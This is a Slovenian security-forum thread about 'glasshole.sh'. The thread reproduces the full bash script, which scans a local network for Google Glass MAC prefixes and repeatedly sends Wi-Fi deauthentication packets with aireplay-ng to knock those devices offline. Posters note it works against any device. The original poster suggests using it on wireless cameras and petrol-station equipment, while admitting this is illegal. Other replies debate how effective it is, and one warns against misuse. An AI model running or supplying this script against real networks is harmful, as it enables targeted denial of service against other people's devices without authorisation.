Forum » Informacijska varnost » glashole.sh
glashole.sh
ulemek ::
A pozna kdo to zadevo? Se je kdo poigral z njo?
To se da fino ponucati še za kaj drugega, predvsem druge naprave.
#!/bin/bash # # GLASSHOLE.SH # # Find and kick Google Glass devices from your local wireless network. Requires # 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host. Put on a BeagleBone # black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N) # and wear it, hide it in your workplace or your exhibition. # # Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows: # # sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> # # Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew). shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. NIC=$1 # Your wireless NIC BSSID=$2 # Network BSSID (exhibition, workplace, park) MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }') GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass. POLL=30 # Check every 30 seconds airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device echo ' ___ _ __ __ __ __ __ / _ \___ ___ ( ) /_ / / ___ ___ _ ___ _/ /__ ____ ___ / / ___ / /__ / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_) /____/\___/_//_/ \__/ /_.__/\__/ \_,_/ \_, /_/\_,_/___/___/_//_/\___/_/\__/ /___/ ' while true; do for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \ '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') do if [[ $TARGET == $GGMAC ]] then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo "Glasshole discovered: "$TARGET echo "De-authing..." aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 else echo $TARGET": is not a Google Glass. Leaving alone.." fi done echo "None found this round." sleep $POLL done airmon-ng stop mon0
To se da fino ponucati še za kaj drugega, predvsem druge naprave.
stb ::
Se ponovno prijavi, pa ga spet dol vrže. Koliko ljudi pa zna spremeniti MAC naslov svoje naprave pa tudi ni težko ugibati (če na laptopih to nekako še gre je pa bolj zabavno to početi na telefonih, kaj šele na google očalih). In koliko ljudem bo sploh prišla na misel menjava MAC naslova?
N4m31355 ::
te zadeve so dost ql. neke produktivne zadeve niti ni.. gres na router pa blokiras ip.. ustvars mac listo pa blokira use.. je pa uporabn ce cs kej testirat recimo, al pa ce cs koga ugasnt.
stb ::
Seznam MAC naslovov lahko pripraviš samo za določen nabor naprav. Veliko lažje je filtrirati po proizvajalcih v OUI, kjer na en mah (oz z eno vrstico) lahko zajameš vse naprave:
GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass.
Zgodovina sprememb…
- spremenil: stb ()
c3p0 ::
In kako so ti ljudje sploh prišli do gesla? Nekega uporabnega načina tu ne vidim, razen podjebavanja uporabnikov. Če bo kdo želel delati štalo v omrežju, pa ga to ne bo ustavilo.
ulemek ::
V bistvu ne potrebuješ nobenih gesel, ker zadeva izrablja ranljivost ali bolje pomanjkljivost IEEE 802.11 protokola, kar rezultira v selektivnem DoS napadu povezanih naprav.
S tem se da fino onesposobiti brezžične kamere idr. naprave, celo nekatere naprave na bencinskih črpalkah (namerno ne bom zapisal katerih in kje), kar je seveda nezakonito. Thnično pa je uporaba omejena zgolj na domišljijo.
S tem se da fino onesposobiti brezžične kamere idr. naprave, celo nekatere naprave na bencinskih črpalkah (namerno ne bom zapisal katerih in kje), kar je seveda nezakonito. Thnično pa je uporaba omejena zgolj na domišljijo.
Roadkill ::
Dobro no... ne vem kaj je point tele debate.
Jedro skripte je
>> aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
"-0 1" pomeni da pošlje en DEAUTH paket na napravo z MAC naslovom $TARGET.
Ja, to zadevo se da uporabit za katero koli napravo.
Ne, ne izkorišča nobene ranljivosti.
Ne, ne boš nobene škode naredil.
Kdor ima pa karkoli uporabnega povezanega na unsecured WiFi, si je pa tako sam kriv.
@OP: Ne počni neumnosti.
Jedro skripte je
>> aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
"-0 1" pomeni da pošlje en DEAUTH paket na napravo z MAC naslovom $TARGET.
Ja, to zadevo se da uporabit za katero koli napravo.
Ne, ne izkorišča nobene ranljivosti.
Ne, ne boš nobene škode naredil.
Kdor ima pa karkoli uporabnega povezanega na unsecured WiFi, si je pa tako sam kriv.
@OP: Ne počni neumnosti.
Ü
ulemek ::
Dobro no... ne vem kaj je point tele debate.
Jedro skripte je
>> aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
"-0 1" pomeni da pošlje en DEAUTH paket na napravo z MAC naslovom $TARGET.
Ja, to zadevo se da uporabit za katero koli napravo.
Ne, ne izkorišča nobene ranljivosti.
Sem se med pisanjem popravil, pomanjkljivost. In to tudi je.
Ne, ne boš nobene škode naredil.
Kdor ima pa karkoli uporabnega povezanega na unsecured WiFi, si je pa tako sam kriv.
Danes niti napadi na WPA2 s PSK niso redkost, prek WPS pa je to v določenih primerih otročje lažje. Številne štacune, bencinski servisi, hoteli imajo ločena omrežja za komunikacijo z raznimi namenskimi napravami, ki so zaščitena samo z WEP.
@OP: Ne počni neumnosti.
OP?
Gandalfar ::
"op" - original poster (avtor izvornega posta)
Zgodovina sprememb…
- spremenil: Gandalfar ()
ulemek ::
"op" - original poster (avtor izvornega posta)
Hvala, G.
Roadkill, a počnem neumnosti? Razmišljam in debatiram, nikogar ne napeljujem k ničemer. A je v tem kaj narobe?
kaksni napadi na WPA2 s PSK?
Ni tema te debate, poguglaj.
Zgodovina sprememb…
- spremenilo: ulemek ()
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | tp-link TL-WA730RE kot Wireless Range ExtenderOddelek: Omrežja in internet | 5340 (4021) | Mikec17 |
» | Alfa USB card chop chopOddelek: Omrežja in internet | 1406 (1228) | Yacked2 |
» | Kateri sata driver je pravi za TOSHIBA SATELLITE L40-Q17???Oddelek: Strojna oprema | 5780 (2603) | Leoon |
» | Diagnostično orodje za WDOddelek: Programska oprema | 4447 (4307) | clovk |
» | Zanima me mnenje o idejiOddelek: Izdelava spletišč | 1667 (1359) | root987 |